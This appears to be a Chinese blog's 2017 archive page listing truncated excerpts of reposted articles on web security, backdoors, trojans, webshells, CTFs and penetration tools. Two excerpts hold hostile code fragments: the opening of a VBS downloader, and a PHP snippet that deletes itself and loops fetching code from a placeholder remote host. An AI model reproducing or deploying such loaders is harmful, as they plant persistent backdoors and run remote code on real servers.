01 2017 档案
摘要:转载自:i春秋社区 原文:http://bbs.ichunqiu.com/thread-18414-1-1.html 0x01 什么是WAF Web应用防护系统(也称:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。利用国际上公认的一种说法:Web应
阅读全文
摘要:转载自:i春秋社区 原文:http://bbs.ichunqiu.com/thread-18486-1-1.html 本帖最后由 sucppVK 于 2017-1-26 12:40 编辑 一、前言 本文原创作者:sucppVK,本文属i春秋原创奖励计划,未经许可禁止转载! 凭什么只有别人给我们带后门
阅读全文
摘要:转载自:http://www.weixianmanbu.com/article/1369.html 很喜欢网上的一篇关于木马编程的文章,让我们这些新手也能有机会去DIY,虽然和牛人们的那些功能强人的木马比起来有些微不足道,但能使用cmd控制肉鸡已经可以做很多事情了,最重要的是不会被杀毒软所查杀,但是
阅读全文
摘要:转载自:https://www.cnblogs.com/REscan/p/6306491.html 一、VBS下载者: Set Post = CreateObject("Msxml2.XMLHTTP")Set Shell = CreateObject("Wscript.Shell")Post.Ope
阅读全文
摘要:转载自:http://blog.csdn.net/michael_veking 作者:veking 本文的目的是探讨JS相关技术,并不是以杀毒为主要目的,杀毒只是为讲解一些JS做铺垫的,呵呵,文章有点长,倒杯咖啡或者清茶慢慢看,学习切勿急躁! 最近公司的网络中了这两天闹的很欢的ARP病毒,导致大家都
阅读全文
摘要:编号SL-14RB:浅谈卫星安全の第一弹:https://www.easyaq.com/newsdetail/id/1376973200.shtml 编号SL-14RB:浅谈卫星安全の第二弹:https://www.easyaq.com/newsdetail/id/852277165.shtml 编
阅读全文
摘要:来自:安全客 About Me id:redrain 熟悉各种主流,非主流渗透测试技术 资深赛棍,CTF,wargame爱好者,获国内各大CTF冠亚季军balabala light4freedom成员 blog: http://www.hackdog.me 部分writeup: http://www
阅读全文
摘要:<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xxx/xxx.txt'; while($code = file_get_con
阅读全文
摘要:转载自:http://www.huawuya.cn/2017/01/21/黑客社会工程学攻击手段全解析 黑客攻击用户常见的方法包括恶意钓鱼攻击、网页挂马攻击、社会工程学攻击及渗透攻击等多种方式。在前两期中我们介绍了关于恶意钓鱼攻击和网页挂马攻击的相关手段,本期我们将对黑客社会工程学攻击方式进行分析和
阅读全文
摘要:摘自:91ri.org 工具:手工注入帮助系统 先抓个输入错误密码的包..把post的数据抓出来 这里这么填…注意把密码段改成字典的变量 然后看看返回信息 看我标蓝得这段是密码输错的时候返回的信息..就拿这段作为关键字 密码字典再设一下 点start就可以开始破了..
阅读全文
摘要:转载自:http://www.91ri.org/4413.html 上个星期我被邀请组队去参加一个由CSAW组织的CTF夺旗比赛.因为老婆孩子的缘故,我只能挑一个与Web漏洞利用相关的题目,名字叫做”HorceForce”.这道题价值300点。这道题大概的背景是,你拥有一个低权限的帐号并需要找到方法
阅读全文
摘要:转载自:http://www.77169.com/hack/201507/204949.shtm 转载自:http://www.77169.com/hack/201507/204949.shtm 导读 文中提及的局部技术能够带有一定攻击性,仅供平安学习和教学用处,制止合法运用。中国菜刀,不必多说,是
阅读全文
摘要:转载自:http://www.freebuf.com/news/111421.html 在Black Hat 2016大会上,两名比利时的安全研究人员展示了他们今年的研究成果。他们发现了一个WEB攻击方式可以绕过HTTPS加密得到明文信息。他们把这种攻击方式叫做HEIST攻击。HEIST的全称是En
阅读全文
摘要:转载自:http://blog.chinaunix.net/xmlrpc.php?r=blog/article&uid=28790518&id=5072333 这里对wifi的802.11协议中比较常见的知识做一个基本的总结和整理,便于后续的学习。因为无线网络中涉及术语很多,并且许多协议都是用英文描
阅读全文
摘要:转载自:http://www.vuln.cn/8395 eval与assert都算是元老级一句话后门函数,其实很多情形下代码的执行还是需要依靠eval去执行,只是前锋路转了而已。 eval与assert函数的用法大家可以自行百度。 eval与assert区别 eval函数中参数是字符,如: eval
阅读全文
摘要:testdisk 命令行工具,不支持xfs文件格式) 下载地址:http://www.cgsecurity.org/wiki/TestDisk_Download diskgenius diskgenius可以直接加载虚拟硬盘:“支持VMWare虚拟硬盘文件(“.vmdk”文件)。 打开虚拟硬盘文件后
阅读全文
摘要:本文转载自:http://www.vuln.cn/2952 给大家从普通get请求上来剖析一些白帽或者白帽手段,你会发现干预一个普通get请求就能够达到很多目的,无论是好是坏。 当然以下内容不提倡大家用于非法用途。 百度蜘蛛的那些事 现在回想起那些年被奉为高大上职业的SEO,简直可笑,也是是角度不同
阅读全文
摘要:转载自“安全客”:http://bobao.360.cn/learning/detail/3375.html 根据纵深防御的概念,一个保护重要服务的多层安全架构,在信息技术领域具有重要地位。基于此,在建设企业网络时,关键系统不能与其他系统在同一网络中。在这篇文章中,我们将结合实例,分析通过使用双网卡
阅读全文
摘要:转载自:http://mp.weixin.qq.com/s/hKuhz6SZ7tXEHUqla1PsIQ 一、背景知识 自助终端机是将触控屏和相关软件捆绑在一起再配以外包装用以查询用途的一种产品。其应用范围广泛,涉及到金融、交通、邮政系统、城市建设、工业控制等各行业,在机场、车站、银行、酒店、医院、
阅读全文
摘要:转载自:http://www.mottoin.com/95177.html 各位老司机在日常的渗透过程中,都会有自己趁手的工具集合,有开源的有私有的,不管什么样的工具组合,能够达到最佳的渗透效果就是好工具,老司机分享一点自己在内网渗透中惯用的开源工具和平台。 渗透测试平台类 Metasploit:这
阅读全文
浙公网安备 33010602011771号